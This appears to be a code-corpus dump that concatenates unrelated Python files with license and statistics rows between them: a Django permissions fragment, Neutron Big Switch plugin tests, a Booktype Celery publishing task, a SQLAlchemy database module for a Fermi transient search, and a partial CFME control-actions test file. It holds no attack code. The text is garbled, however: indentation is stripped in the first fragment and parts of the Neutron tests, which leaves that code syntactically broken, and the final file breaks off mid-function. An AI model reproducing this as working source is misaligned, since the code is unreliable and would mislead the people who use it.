return "%s.%s: %s (%i)" % (self.app_label, self.model_name, self.slug, self.id)
else:
return "%s.%s: %i" % (self.app_label, self.model_name, self.id)
@property
def title_or_description(self):
"""
        Return either title or description (or slug) but avoid the empty string by all means.
The return value is considered HTML-safe.
"""
for attr in ('title', 'description', 'slug', 'id'):
v = getattr(self, attr, None)
if not v:
continue
if attr=='id':
v = str(v)
if not isinstance(v, unicode):
v = unicode(v, errors = 'ignore')
            # Important: to display a description we always go through the wiki
            # filter, which applies mark_safe itself (after special treatment),
            # so descriptions are returned unmarked here.
if attr!='description':
return mark_safe(v)
return v
class Meta:
app_label = 'twistapp'
# #
# Security Management #
# #
# XXX TODO: Use a more generic approach? And some caching as well? #
# XXX Also, must check that permissions are valid for the given obj #
# #
def getDefaultOwner(self,):
"""
General case: owner is the auth account (or SystemAccount if not found?)
"""
return Twistable.objects._getAuthenticatedAccount()
def getDefaultPublisher(self,):
"""
General case: publisher is the auth account (or SystemAccount if not found?)
"""
return Twistable.objects._getAuthenticatedAccount()
@property
def can_view(self):
if not self.id: return True # Can always view an unsaved object
auth = Twistable.objects._getAuthenticatedAccount()
return auth.has_permission(permissions.can_view, self)
@property
def can_delete(self):
if not self.id: return True # Can always delete an unsaved object
auth = Twistable.objects._getAuthenticatedAccount()
return auth.has_permission(permissions.can_delete, self)
@property
def can_edit(self):
if not self.id: return True # Can always edit an unsaved object
auth = Twistable.objects._getAuthenticatedAccount()
return auth.has_permission(permissions.can_edit, self)
@property
def can_publish(self):
"""
True if authenticated account can publish on the current account object
"""
if not self.id: return False # Can NEVER publish an unsaved object
auth = Twistable.objects._getAuthenticatedAccount()
return auth.has_permission(permissions.can_publish, self)
@property
def can_list(self):
"""
Return true if the current account can list the current object.
"""
if not self.id: return True # Can always list an unsaved object
auth = Twistable.objects._getAuthenticatedAccount()
return auth.has_permission(permissions.can_list, self)
# #
# Views relations #
# #
@property
def summary_view(self):
return self.model_class.type_summary_view
@property
def detail_view(self):
return self.model_class.type_detail_view
| agpl-3.0 | 8,492,852,835,539,124,000 | 43.911268 | 151 | 0.581365 | false |
beagles/neutron_hacking | neutron/tests/unit/bigswitch/test_restproxy_plugin.py | 1 | 13331 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 Big Switch Networks, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from contextlib import nested
import mock
from oslo.config import cfg
import webob.exc
from neutron import context
from neutron.extensions import portbindings
from neutron.manager import NeutronManager
from neutron.tests.unit import _test_extension_portbindings as test_bindings
from neutron.tests.unit.bigswitch import fake_server
from neutron.tests.unit.bigswitch import test_base
from neutron.tests.unit import test_api_v2
import neutron.tests.unit.test_db_plugin as test_plugin
import neutron.tests.unit.test_extension_allowedaddresspairs as test_addr_pair
patch = mock.patch
class BigSwitchProxyPluginV2TestCase(test_base.BigSwitchTestBase,
test_plugin.NeutronDbPluginV2TestCase):
def setUp(self, plugin_name=None):
self.setup_config_files()
self.setup_patches()
if plugin_name:
self._plugin_name = plugin_name
super(BigSwitchProxyPluginV2TestCase, self).setUp(self._plugin_name)
self.port_create_status = 'BUILD'
class TestBigSwitchProxyBasicGet(test_plugin.TestBasicGet,
BigSwitchProxyPluginV2TestCase):
pass
class TestBigSwitchProxyV2HTTPResponse(test_plugin.TestV2HTTPResponse,
BigSwitchProxyPluginV2TestCase):
def test_failover_memory(self):
# first request causes failover so next shouldn't hit bad server
with self.network() as net:
kwargs = {'tenant_id': 'ExceptOnBadServer'}
with self.network(**kwargs) as net:
req = self.new_show_request('networks', net['network']['id'])
res = req.get_response(self.api)
self.assertEqual(res.status_int, 200)
class TestBigSwitchProxyPortsV2(test_plugin.TestPortsV2,
BigSwitchProxyPluginV2TestCase,
test_bindings.PortBindingsTestCase):
VIF_TYPE = portbindings.VIF_TYPE_OVS
HAS_PORT_FILTER = False
def test_update_port_status_build(self):
with self.port() as port:
self.assertEqual(port['port']['status'], 'BUILD')
self.assertEqual(self.port_create_status, 'BUILD')
def _get_ports(self, netid):
return self.deserialize('json',
self._list_ports('json', netid=netid))['ports']
def test_rollback_for_port_create(self):
plugin = NeutronManager.get_plugin()
with self.subnet() as s:
self.httpPatch = patch('httplib.HTTPConnection', create=True,
new=fake_server.HTTPConnectionMock500)
self.httpPatch.start()
kwargs = {'device_id': 'somedevid'}
# allow thread spawns for this patch
self.spawn_p.stop()
with self.port(subnet=s, **kwargs):
self.spawn_p.start()
plugin.evpool.waitall()
self.httpPatch.stop()
ports = self._get_ports(s['subnet']['network_id'])
            # failure to create should result in the port being in error state
self.assertEqual(ports[0]['status'], 'ERROR')
def test_rollback_for_port_update(self):
with self.network() as n:
with self.port(network_id=n['network']['id'],
device_id='66') as port:
port = self._get_ports(n['network']['id'])[0]
data = {'port': {'name': 'aNewName', 'device_id': '99'}}
self.httpPatch = patch('httplib.HTTPConnection', create=True,
new=fake_server.HTTPConnectionMock500)
self.httpPatch.start()
self.new_update_request('ports',
data,
port['id']).get_response(self.api)
self.httpPatch.stop()
uport = self._get_ports(n['network']['id'])[0]
# name should have stayed the same
self.assertEqual(port['name'], uport['name'])
def test_rollback_for_port_delete(self):
with self.network() as n:
with self.port(network_id=n['network']['id'],
device_id='somedevid') as port:
self.httpPatch = patch('httplib.HTTPConnection', create=True,
new=fake_server.HTTPConnectionMock500)
self.httpPatch.start()
self._delete('ports', port['port']['id'],
expected_code=
webob.exc.HTTPInternalServerError.code)
self.httpPatch.stop()
port = self._get_ports(n['network']['id'])[0]
self.assertEqual('BUILD', port['status'])
def test_correct_shared_net_tenant_id(self):
# tenant_id in port requests should match network tenant_id instead
# of port tenant_id
def rest_port_op(self, ten_id, netid, port):
if ten_id != 'SHARED':
raise Exception('expecting tenant_id SHARED. got %s' % ten_id)
with self.network(tenant_id='SHARED', shared=True) as net:
with self.subnet(network=net) as sub:
pref = 'neutron.plugins.bigswitch.servermanager.ServerPool.%s'
tomock = [pref % 'rest_create_port',
pref % 'rest_update_port',
pref % 'rest_delete_port']
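                # Patch every REST port operation with the stub above so that any
                # call carrying the wrong tenant_id raises immediately.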
patches = [patch(f, create=True, new=rest_port_op)
for f in tomock]
for restp in patches:
restp.start()
with self.port(subnet=sub, tenant_id='port-owner') as port:
data = {'port': {'binding:host_id': 'someotherhost',
'device_id': 'override_dev'}}
req = self.new_update_request('ports', data,
port['port']['id'])
res = req.get_response(self.api)
self.assertEqual(res.status_int, 200)
def test_create404_triggers_sync(self):
# allow async port thread for this patch
self.spawn_p.stop()
with nested(
self.subnet(),
patch('httplib.HTTPConnection', create=True,
new=fake_server.HTTPConnectionMock404),
patch(test_base.RESTPROXY_PKG_PATH
+ '.NeutronRestProxyV2._send_all_data')
) as (s, mock_http, mock_send_all):
with self.port(subnet=s, device_id='somedevid') as p:
# wait for the async port thread to finish
plugin = NeutronManager.get_plugin()
plugin.evpool.waitall()
call = mock.call(
send_routers=True, send_ports=True, send_floating_ips=True,
triggered_by_tenant=p['port']['tenant_id']
)
mock_send_all.assert_has_calls([call])
self.spawn_p.start()
class TestBigSwitchProxyPortsV2IVS(test_plugin.TestPortsV2,
BigSwitchProxyPluginV2TestCase,
test_bindings.PortBindingsTestCase):
VIF_TYPE = portbindings.VIF_TYPE_IVS
HAS_PORT_FILTER = False
def setUp(self):
super(TestBigSwitchProxyPortsV2IVS,
self).setUp()
cfg.CONF.set_override('vif_type', 'ivs', 'NOVA')
class TestNoHostIDVIFOverride(test_plugin.TestPortsV2,
BigSwitchProxyPluginV2TestCase,
test_bindings.PortBindingsTestCase):
VIF_TYPE = portbindings.VIF_TYPE_OVS
HAS_PORT_FILTER = False
def setUp(self):
super(TestNoHostIDVIFOverride, self).setUp()
cfg.CONF.set_override('vif_type', 'ovs', 'NOVA')
def test_port_vif_details(self):
kwargs = {'name': 'name', 'device_id': 'override_dev'}
with self.port(**kwargs) as port:
self.assertEqual(port['port']['binding:vif_type'],
portbindings.VIF_TYPE_OVS)
class TestBigSwitchVIFOverride(test_plugin.TestPortsV2,
BigSwitchProxyPluginV2TestCase,
test_bindings.PortBindingsTestCase):
VIF_TYPE = portbindings.VIF_TYPE_OVS
HAS_PORT_FILTER = False
def setUp(self):
super(TestBigSwitchVIFOverride,
self).setUp()
cfg.CONF.set_override('vif_type', 'ovs', 'NOVA')
def test_port_vif_details(self):
kwargs = {'name': 'name', 'binding:host_id': 'ivshost',
'device_id': 'override_dev'}
with self.port(**kwargs) as port:
self.assertEqual(port['port']['binding:vif_type'],
portbindings.VIF_TYPE_IVS)
kwargs = {'name': 'name2', 'binding:host_id': 'someotherhost',
'device_id': 'other_dev'}
with self.port(**kwargs) as port:
self.assertEqual(port['port']['binding:vif_type'], self.VIF_TYPE)
def test_port_move(self):
kwargs = {'name': 'name', 'binding:host_id': 'ivshost',
'device_id': 'override_dev'}
with self.port(**kwargs) as port:
data = {'port': {'binding:host_id': 'someotherhost',
'device_id': 'override_dev'}}
req = self.new_update_request('ports', data, port['port']['id'])
res = self.deserialize(self.fmt, req.get_response(self.api))
self.assertEqual(res['port']['binding:vif_type'], self.VIF_TYPE)
def _make_port(self, fmt, net_id, expected_res_status=None, arg_list=None,
**kwargs):
arg_list = arg_list or ()
arg_list += ('binding:host_id', )
res = self._create_port(fmt, net_id, expected_res_status,
arg_list, **kwargs)
# Things can go wrong - raise HTTP exc with res code only
# so it can be caught by unit tests
if res.status_int >= 400:
raise webob.exc.HTTPClientError(code=res.status_int)
return self.deserialize(fmt, res)
class TestBigSwitchProxyNetworksV2(test_plugin.TestNetworksV2,
BigSwitchProxyPluginV2TestCase):
def _get_networks(self, tenant_id):
ctx = context.Context('', tenant_id)
return NeutronManager.get_plugin().get_networks(ctx)
def test_rollback_on_network_create(self):
tid = test_api_v2._uuid()
kwargs = {'tenant_id': tid}
self.httpPatch = patch('httplib.HTTPConnection', create=True,
new=fake_server.HTTPConnectionMock500)
self.httpPatch.start()
self._create_network('json', 'netname', True, **kwargs)
self.httpPatch.stop()
self.assertFalse(self._get_networks(tid))
def test_rollback_on_network_update(self):
with self.network() as n:
data = {'network': {'name': 'aNewName'}}
self.httpPatch = patch('httplib.HTTPConnection', create=True,
new=fake_server.HTTPConnectionMock500)
self.httpPatch.start()
self.new_update_request('networks', data,
n['network']['id']).get_response(self.api)
self.httpPatch.stop()
updatedn = self._get_networks(n['network']['tenant_id'])[0]
# name should have stayed the same due to failure
self.assertEqual(n['network']['name'], updatedn['name'])
def test_rollback_on_network_delete(self):
with self.network() as n:
self.httpPatch = patch('httplib.HTTPConnection', create=True,
new=fake_server.HTTPConnectionMock500)
self.httpPatch.start()
self._delete('networks', n['network']['id'],
expected_code=webob.exc.HTTPInternalServerError.code)
self.httpPatch.stop()
# network should still exist in db
self.assertEqual(n['network']['id'],
self._get_networks(n['network']['tenant_id']
)[0]['id'])
class TestBigSwitchProxySubnetsV2(test_plugin.TestSubnetsV2,
BigSwitchProxyPluginV2TestCase):
pass
class TestBigSwitchProxySync(BigSwitchProxyPluginV2TestCase):
def test_send_data(self):
plugin_obj = NeutronManager.get_plugin()
result = plugin_obj._send_all_data()
self.assertEqual(result[0], 200)
class TestBigSwitchAddressPairs(BigSwitchProxyPluginV2TestCase,
test_addr_pair.TestAllowedAddressPairs):
pass
| apache-2.0 | -6,112,451,128,211,050,000 | 41.864952 | 79 | 0.57295 | false |
rob-hills/Booktype | lib/booktype/apps/edit/tasks.py | 1 | 2110 | import json
import celery
import urllib2
import httplib
import sputnik
from booki.editor import models
def fetch_url(url, data):
try:
data_json = json.dumps(data)
except TypeError:
return None
req = urllib2.Request(url, data_json)
req.add_header('Content-Type', 'application/json')
req.add_header('Content-Length', len(data_json))
try:
r = urllib2.urlopen(req)
    except (urllib2.HTTPError, urllib2.URLError, httplib.HTTPException):
        # The request failed; bail out instead of falling through with `r` unbound.
        return None
    except Exception:
        return None
# should really be a loop of some kind
try:
s = r.read()
dta = json.loads(s.strip())
    except Exception:
return None
return dta
@celery.task
def publish_book(*args, **kwargs):
import urllib2
import json
import logging
# set logger
logger = logging.getLogger('booktype')
logger.debug(kwargs)
book = models.Book.objects.get(id=kwargs['bookid'])
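    # Conversion request payload: point the converter at this book's EPUB
    # export and ask for an epub-profile output with the book as project id.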
data = {
"assets" : {
"testbook.epub" : "http://127.0.0.1:8000/%s/_export/" % book.url_title
},
"input" : "testbook.epub",
"outputs": {
"two" : {
"profile" : "epub",
"config": {
'project_id': book.url_title
},
"output" : "testbook.epub"
}
}
}
logger.debug(data)
result = fetch_url('http://127.0.0.1:8000/_convert/', data)
logger.debug(result)
task_id = result['task_id']
while True:
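        # Poll the conversion status endpoint until the task reports a final
        # state (SUCCESS or FAILURE), relaying progress over sputnik meanwhile.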
logger.debug('http://127.0.0.1:8000/_convert/%s' % task_id)
response = urllib2.urlopen('http://127.0.0.1:8000/_convert/%s' % task_id).read()
dta = json.loads(response)
logger.debug(dta)
sputnik.addMessageToChannel2(
kwargs['clientid'],
kwargs['sputnikid'],
"/booktype/book/%s/%s/" % (book.pk, kwargs['version']), {
"command": "publish_progress",
"state": dta['state']
},
myself=True
)
if dta['state'] in ['SUCCESS', 'FAILURE']:
break | agpl-3.0 | 1,521,317,830,055,630,300 | 23.264368 | 88 | 0.536019 | false |
giacomov/fermi_blind_search | fermi_blind_search/database.py | 1 | 14427 | #!/usr/bin/env python
from contextlib import contextmanager
import argparse
import sys
import sshtunnel
from sqlalchemy import *
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker
from fermi_blind_search.configuration import get_config
from fermi_blind_search import myLogging
_logger = myLogging.log.getLogger("database")
# will store the engine that will connect to the database
_engine = None
# we need this to handle the tables
Base = declarative_base()
# defines the class that will connect to the database
Session = sessionmaker()
@contextmanager
def database_connection(config):
if config.get("SSH db tunnel", "remote_host") != '':
"""
As of now, we are not using this in the real time search. Instead we are using an autossh connection to
facilitate tunneling. However, we are keeping the code here in case an ssh tunnel needs to be established from
a python script in the future.
"""
with sshtunnel.SSHTunnelForwarder(config.get("SSH db tunnel", "remote_host"),
ssh_username=config.get("SSH db tunnel", "username"),
host_pkey_directories=[
config.get("SSH db tunnel", "key_directory")],
remote_bind_address=('127.0.0.1',
int(config.get("SSH db tunnel", "tunnel_port"))),
local_bind_address=('localhost',
int(config.get('Real time', 'db_port'))),
):
db_instance = Database(config)
try:
yield db_instance
except:
raise
finally:
db_instance.close()
else:
db_instance = Database(config)
try:
yield db_instance
except:
raise
finally:
db_instance.close()
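# Typical usage of the context manager above (a sketch; `config` is a parsed
# configuration object such as the one returned by get_config):
#
#     with database_connection(config) as db:
#         results = db.get_results_to_email()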
class Database(object):
def __init__(self, config):
global Base
global Session
global _engine
# initialize the engine using parameters from the config file
if config.get("Real time", "is_sqlite") == "True":
engine_url = "sqlite:///" + config.get("Real time", "db_path")
else:
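            # Builds e.g. "mysql://user:password@host:port/dbname"; every piece
            # comes from the [Real time] config section (the mysql dialect here
            # is just an illustration).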
engine_url = config.get("Real time", "db_dialect") + "://" + config.get("Real time", "db_username") + ":" + \
config.get("Real time", "db_password") + "@" + config.get("Real time", "db_host") + ":" + \
config.get("Real time", "db_port") + "/" + config.get("Real time", "db_path")
_logger.debug("Database engine URL: %s" % engine_url)
_engine = create_engine(engine_url)
# bind the engine to the Base
Base.metadata.bind = _engine
# bind the engine to the session
Session.configure(bind=_engine)
self._config = config
def create_tables(self):
# create the Analysis and Results tables
Base.metadata.create_all(_engine)
_logger.info("Successfully created database tables")
def delete_analysis_table(self):
# drop the table from the DB
try:
Analysis.__table__.drop()
except:
try:
# another way to drop the table
Analysis.__table__.drop(_engine)
except:
_logger.error('ERROR: Could not delete Analysis Table')
raise
else:
_logger.info("Successfully deleted Analysis table")
def delete_results_table(self):
# drop the table from the DB
try:
Results.__table__.drop()
except:
try:
# another way to drop the table
Results.__table__.drop(_engine)
except:
_logger.error('ERROR: Could not delete Results Table')
raise
else:
_logger.info("Successfully delete Results table")
def add_analysis(self, analysis_vals):
        # TODO: should we check that analysis_vals contains the correct fields?
# TODO: do we want to add a check that the analysis doesn't already exist?
assert (analysis_vals['met_start'] is not None and analysis_vals['duration'] is not None and
analysis_vals['counts'] is not None and analysis_vals['directory'] is not None), \
"One of the parameters to enter the analysis into the database is missing. Parameters are met_start, " \
"duration, counts, and directory"
assert isinstance(analysis_vals["counts"], int), "Counts is not an integer"
try:
# set the values of the analysis to be added to the table
new_analysis = Analysis(met_start=analysis_vals['met_start'], duration=analysis_vals['duration'],
counts=analysis_vals['counts'], directory=analysis_vals['directory'])
_logger.info("Adding this Analysis to the database: %s" % new_analysis)
except KeyError:
_logger.error('ERROR: The analysis you want to add does not have the proper fields!')
raise
except:
raise
else:
# open a session, add the analysis to the table, close the session
session = Session()
session.add(new_analysis)
try:
session.commit()
except:
raise
else:
_logger.debug("Successfully added analysis to db")
def update_analysis_counts(self, met_start, duration, new_counts):
# open a session with the DB
session = Session()
# get the analysis to be updated
results = session.query(Analysis).filter(Analysis.met_start == met_start).filter(
Analysis.duration == duration).all()
# check that there is only one analysis that matches these parameters
assert len(results) != 0, "Cannot update this analysis because it does not exist"
assert len(results) == 1, 'More than one analysis exists with these parameters! This should never happen'
analysis = results[0]
_logger.info("Updating this analysis: %s to have %s counts" % (analysis, new_counts))
# update the counts column of the analysis in question
analysis.counts = new_counts
try:
# commit the change
session.commit()
except:
raise
else:
_logger.debug("Successfully updated analysis")
def add_candidate(self, candidate_vals):
        # TODO: should we check that candidate_vals contains the correct fields?
# TODO: do we want to add a check that the candidate doesn't already exist?
assert (candidate_vals['ra'] is not None and candidate_vals['dec'] is not None and
candidate_vals['met_start'] is not None and candidate_vals['interval'] is not None and
candidate_vals['email'] is not None), \
"One of the parameters to enter the candidate into the database is missing. Parameters are ra, dec, " \
"met_start, interval, email"
try:
# set the values of the result to be added to the table
new_candidate = Results(ra=candidate_vals['ra'], dec=candidate_vals['dec'],
met_start=candidate_vals['met_start'], interval=candidate_vals['interval'],
email=candidate_vals['email'])
_logger.info("Adding this result to the database %s" % new_candidate)
except KeyError:
_logger.error('ERROR: The result you want to add does not have the proper fields')
raise
except:
raise
else:
# open a session, add the result to the table, close the session
session = Session()
session.add(new_candidate)
try:
session.commit()
except:
raise
else:
_logger.debug("Successfully added result to database")
return new_candidate
def get_analysis_between_times(self, start, stop):
_logger.info("Fetching analyses using data between %s and %s" % (start, stop))
# open a session
session = Session()
# get all analyses with met_start or met_stop (met_start + duration) times within the range [start,stop]
return session.query(Analysis).filter(or_(and_(Analysis.met_start >= start, Analysis.met_start <= stop),
and_(Analysis.met_start + Analysis.duration >= start,
Analysis.met_start + Analysis.duration <= stop))).all()
def get_exact_analysis(self, start, stop):
_logger.info("Fetching analysis with met_start = %s and met_start + duration = %s" % (start, stop))
# open a session
session = Session()
# get all analyses with start time and stop times exactly matching the parameters
return session.query(Analysis).filter(and_(Analysis.met_start == start,
Analysis.met_start + Analysis.duration == stop)).all()
def get_results(self, candidate_vals):
# check that candidate vals has the correct fields to perform a search
assert (candidate_vals['ra'] is not None and candidate_vals['dec'] is not None and
candidate_vals['met_start'] is not None and candidate_vals['interval'] is not None), \
"One of the parameters to enter the candidate into the database is missing. Parameters are ra, dec, " \
"met_start, interval"
# open a session
session = Session()
# get the tolerance ranges for determining if we have a match
ra_tol = float(self._config.get("Real time", "ra_tol"))
dec_tol = float(self._config.get("Real time", "dec_tol"))
start_tol = float(self._config.get("Real time", "start_tol"))
int_tol = float(self._config.get("Real time", "int_tol"))
_logger.info("Fetching results within %s of ra, %s of dec, %s of met_start, and %s of interval of %s" %
(ra_tol, dec_tol, start_tol, int_tol, candidate_vals))
# get all results that match the passed candidate within a certain tolerance
return session.query(Results).filter(and_(candidate_vals['ra'] - ra_tol <= Results.ra,
Results.ra <= candidate_vals['ra'] + ra_tol,
candidate_vals['dec'] - dec_tol <= Results.dec,
Results.dec <= candidate_vals['dec'] + dec_tol,
candidate_vals['met_start'] - start_tol <= Results.met_start,
Results.met_start <= candidate_vals['met_start'] + start_tol,
candidate_vals['interval'] - int_tol <= Results.interval,
Results.interval <= candidate_vals['interval'] + int_tol)).all()
def get_results_to_email(self):
_logger.info("Fetching results with email = False (0 in database)")
# open a session
session = Session()
# get all results that have not been emailed yet
return session.query(Results).filter(Results.email == 0).all()
def update_result_email(self, candidate, email_val=False):
_logger.info("Updating result: %s to have email value: %s" % (candidate, email_val))
# open a session
session = Session()
# update the value of the candidate
candidate.email = email_val
try:
# commit the change
session.commit()
except:
raise
else:
_logger.debug("Successfully updated result")
def close(self):
global _logger
_logger.info("Closing database")
Session.close_all()
class Analysis(Base):
# give the table a name
__tablename__ = 'analysis'
# define the columns of the table
met_start = Column(Float(32), Sequence('analysis_met_start_seq'), primary_key=True)
duration = Column(Float(32), Sequence('analysis_duration_seq'), primary_key=True)
counts = Column(Integer)
directory = Column(String(250))
def __repr__(self):
# formatting string so that printing rows from the table is more readable
return "<Analysis(met_start= %s, duration= %s, counts= %s, directory= %s)>" % \
(self.met_start, self.duration, self.counts, self.directory)
class Results(Base):
# give the table a name
__tablename__ = 'results'
# define the columns of the table
ra = Column(Float(32))
dec = Column(Float(32))
met_start = Column(Float(32), Sequence('results_met_start_seq'), primary_key=True)
interval = Column(Float(32), Sequence('results_interval_seq'), primary_key=True)
email = Column(Boolean)
def __repr__(self):
# formatting string so that printing rows from the table is more readable
return "<Results(ra= %s, dec= %s, met_start= %s, interval= %s, email=%s)>" % (self.ra, self.dec,
self.met_start,
self.interval, self.email)
if __name__ == "__main__":
# Allows you to quickly delete and re-create the database.
parser = argparse.ArgumentParser()
parser.add_argument('--config', help='Path to config file', type=get_config, required=True)
parser.add_argument('--clear', help="If set, delete the database tables, and recreate them", action="store_true")
args = parser.parse_args()
configuration = args.config
# start db connection
db = Database(configuration)
if args.clear:
# delete the tables
db.delete_analysis_table()
db.delete_results_table()
# re-create the tables
db.create_tables()
| bsd-3-clause | 5,104,153,105,042,348,000 | 36.375648 | 121 | 0.563249 | false |
okolisny/integration_tests | cfme/tests/control/test_actions.py | 1 | 30857 | # -*- coding: utf-8 -*-
""" Tests used to check whether assigned actions really do what they're supposed to do. Events are
not supported by the gc and scvmm providers. Tests are uncollected for these
providers. When support is implemented, these tests can be enabled for them.
Required YAML keys:
* Provider must have section provisioning/template (otherwise test will be skipped)
* RHEV-M provider must have provisioning/vlan specified, otherwise the test fails on provisioning.
* There should be a 'datastores_not_for_provision' in the root, being a list of datastores that
should not be used for tagging for provisioning. If not present,
  nothing terrible happens, but provisioning can then be assigned to a datastore that does not
work (iso datastore or whatever), therefore failing the provision.
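
An illustrative cfme_data snippet (hypothetical names and values, included only to make the
expected YAML shape concrete):

    management_systems:
      some_provider:
        provisioning:
          template: small-template
          vlan: VM Network
    datastores_not_for_provision:
      - iso-datastore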
"""
import fauxfactory
import pytest
from functools import partial
from cfme.common.provider import cleanup_vm
from cfme.common.vm import VM
from cfme.control.explorer import actions, conditions, policies, policy_profiles
from cfme.infrastructure.provider import InfraProvider
from cfme.infrastructure.provider.scvmm import SCVMMProvider
from cfme.infrastructure.provider.virtualcenter import VMwareProvider
from cfme.infrastructure.provider.rhevm import RHEVMProvider
from cfme.cloud.provider.openstack import OpenStackProvider
from cfme.cloud.provider.azure import AzureProvider
from cfme import test_requirements
from cfme.utils.appliance.implementations.ui import navigate_to
from cfme.utils import conf
from cfme.utils.blockers import BZ
from cfme.utils.generators import random_vm_name
from cfme.utils.hosts import setup_host_creds
from cfme.utils.log import logger
from cfme.utils.pretty import Pretty
from cfme.utils.update import update
from cfme.utils.virtual_machines import deploy_template
from cfme.utils.wait import wait_for, TimedOutError
from . import do_scan, wait_for_ssa_enabled
pytestmark = [
pytest.mark.long_running,
pytest.mark.meta(server_roles="+automate +smartproxy +smartstate"),
pytest.mark.uncollectif(BZ(1491576, forced_streams=['5.7']).blocks, 'BZ 1491576'),
pytest.mark.tier(2),
test_requirements.control
]
class VMWrapper(Pretty):
"""This class binds a provider_mgmt object with VM name. Useful for on/off operation"""
__slots__ = ("_prov", "_vm", "api", "crud")
pretty_attrs = ['_vm', '_prov']
def __init__(self, provider, vm_name, api):
self._prov = provider
self._vm = vm_name
self.api = api
self.crud = VM.factory(vm_name, self._prov)
@property
def name(self):
return self._vm
@property
def provider(self):
return self._prov.mgmt
def __getattr__(self, key):
"""Creates partial functions proxying to mgmt_system.<function_name>(vm_name)"""
func = getattr(self._prov.mgmt, key)
return partial(func, self._vm)
def get_vm_object(appliance, vm_name):
"""Looks up the CFME database for the VM.
Args:
vm_name: VM name
Returns:
If found, returns a REST object
If not, `None`
"""
try:
return appliance.rest_api.collections.vms.find_by(name=vm_name)[0]
except IndexError:
return None
@pytest.fixture(scope="module")
def vm_name(provider):
return random_vm_name("action", max_length=16)
@pytest.fixture(scope="module")
def vm_name_big(provider):
return random_vm_name("action", max_length=16)
@pytest.fixture(scope="function")
def vddk_url(provider):
try:
major, minor = str(provider.version).split(".")
except ValueError:
major = str(provider.version)
minor = "0"
vddk_version = "v{}_{}".format(major, minor)
try:
return conf.cfme_data.get("basic_info").get("vddk_url").get(vddk_version)
except AttributeError:
pytest.skip("There is no vddk url for this VMware provider version")
@pytest.yield_fixture(scope="function")
def configure_fleecing(appliance, provider, vm, vddk_url):
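    # Fleecing (SmartState analysis) needs host credentials and the VDDK on the
    # appliance; set both up here and undo them again on teardown.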
setup_host_creds(provider.key, vm.api.host.name)
appliance.install_vddk(vddk_url=vddk_url)
yield
appliance.uninstall_vddk()
setup_host_creds(provider.key, vm.api.host.name, remove_creds=True)
def _get_vm(request, provider, template_name, vm_name):
if provider.one_of(RHEVMProvider):
kwargs = {"cluster": provider.data["default_cluster"]}
elif provider.one_of(OpenStackProvider):
kwargs = {}
if 'small_template' in provider.data.templates:
kwargs = {"flavour_name": provider.data.templates.get('small_template').name}
elif provider.one_of(SCVMMProvider):
kwargs = {
"host_group": provider.data.get("provisioning", {}).get("host_group", "All Hosts")}
else:
kwargs = {}
try:
deploy_template(
provider.key,
vm_name,
template_name=template_name,
allow_skip="default",
power_on=True,
**kwargs
)
except TimedOutError as e:
logger.exception(e)
try:
provider.mgmt.delete_vm(vm_name)
except TimedOutError:
logger.warning("Could not delete VM %s!", vm_name)
finally:
# If this happened, we should skip all tests from this provider in this module
pytest.skip("{} is quite likely overloaded! Check its status!\n{}: {}".format(
provider.key, type(e).__name__, str(e)))
@request.addfinalizer
def _finalize():
"""if getting REST object failed, we would not get the VM deleted! So explicit teardown."""
logger.info("Shutting down VM with name %s", vm_name)
if (provider.one_of(InfraProvider, OpenStackProvider, AzureProvider) and
provider.mgmt.is_vm_suspended(vm_name)):
logger.info("Powering up VM %s to shut it down correctly.", vm_name)
provider.mgmt.start_vm(vm_name)
if provider.mgmt.is_vm_running(vm_name):
logger.info("Powering off VM %s", vm_name)
provider.mgmt.stop_vm(vm_name)
if provider.mgmt.does_vm_exist(vm_name):
logger.info("Deleting VM %s in %s", vm_name, provider.mgmt.__class__.__name__)
provider.mgmt.delete_vm(vm_name)
# Make it appear in the provider
provider.refresh_provider_relationships()
# Get the REST API object
api = wait_for(
get_vm_object,
func_args=[provider.appliance, vm_name],
message="VM object {} appears in CFME".format(vm_name),
fail_condition=None,
num_sec=600,
delay=15,
)[0]
return VMWrapper(provider, vm_name, api)
@pytest.fixture(scope="module")
def vm(request, provider, setup_provider_modscope, small_template_modscope, vm_name):
return _get_vm(request, provider, small_template_modscope.name, vm_name)
@pytest.fixture(scope="module")
def vm_big(request, provider, setup_provider_modscope, big_template_modscope, vm_name_big):
return _get_vm(request, provider, big_template_modscope.name, vm_name_big)
@pytest.fixture(scope="module")
def name_suffix():
return fauxfactory.gen_alphanumeric()
@pytest.fixture(scope="module")
def policy_name(name_suffix):
return "action_testing: policy {}".format(name_suffix)
@pytest.fixture(scope="module")
def policy_profile_name(name_suffix):
return "action_testing: policy profile {}".format(name_suffix)
@pytest.fixture(scope="module")
def action_collection(appliance):
return appliance.collections.actions
@pytest.fixture(scope="module")
def compliance_condition(appliance):
condition_collection = appliance.collections.conditions
return condition_collection.create(
conditions.VMCondition,
fauxfactory.gen_alpha(),
expression="fill_tag(VM and Instance.My Company Tags : Service Level, Gold)"
)
@pytest.fixture(scope="module")
def policy_collection(appliance):
return appliance.collections.policies
@pytest.fixture(scope="module")
def compliance_policy(vm_name, policy_name, compliance_condition, policy_collection):
compliance_policy = policy_collection.create(
policies.VMCompliancePolicy,
"complaince_{}".format(policy_name),
scope="fill_field(VM and Instance : Name, INCLUDES, {})".format(vm_name)
)
compliance_policy.assign_conditions(compliance_condition)
return compliance_policy
@pytest.yield_fixture(scope="module")
def policy_for_testing(provider, vm_name, policy_name, policy_profile_name, compliance_policy,
compliance_condition, policy_collection, appliance):
control_policy = policy_collection.create(
policies.VMControlPolicy,
policy_name,
scope="fill_field(VM and Instance : Name, INCLUDES, {})".format(vm_name)
)
policy_profile_collection = appliance.collections.policy_profiles
policy_profile = policy_profile_collection.create(
policy_profile_name,
policies=[control_policy, compliance_policy]
)
provider.assign_policy_profiles(policy_profile_name)
yield control_policy
provider.unassign_policy_profiles(policy_profile_name)
policy_profile.delete()
compliance_policy.assign_conditions()
compliance_condition.delete()
compliance_policy.delete()
control_policy.delete()
@pytest.fixture(scope="function")
def vm_on(vm):
""" Ensures that the VM is on when the control goes to the test."""
vm.wait_vm_steady()
if not vm.is_vm_running():
